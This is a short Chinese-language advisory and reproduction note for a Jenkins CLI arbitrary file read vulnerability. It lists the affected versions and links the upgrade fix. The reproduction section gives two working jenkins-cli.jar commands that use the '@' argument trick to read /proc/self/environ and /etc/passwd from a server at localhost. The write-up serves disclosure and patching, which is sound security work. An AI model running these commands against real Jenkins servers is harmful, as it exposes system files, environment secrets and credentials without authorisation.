漏洞简介

Jenkins是一款基于JAVA开发的开源自动化服务器。
Jenkins使用args4j来解析命令行输入，并支持通过HTTP、WebSocket等协议远程传入命令行参数。在args4j中，用户可以通过@字符来加载任意文件，这导致攻击者可以通过该特性来读取服务器上的任意文件。

影响范围：

Jenkins weekly <= 2.441
Jenkins LTS <= 2.426.2

漏洞复现

用该漏洞可以直接使用官方提供的命令行客户端，在http://localhost:8080/jnlpJars/jenkins-cli.jar下载。
使用该工具读取目标服务器的/proc/self/environ文件，可以找到Jenkins的基础目录，JENKINS_HOME=/var/jenkins_home：

java -jar jenkins-cli.jar -s http://localhost:8080/ -http help 1 “@/proc/self/environ”

使用connect-node命令读取完整文件内容：

java -jar jenkins-cli.jar -s http://localhost:8080/ -http connect-node “@/etc/passwd”

修复建议

升级至安全版本：https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3314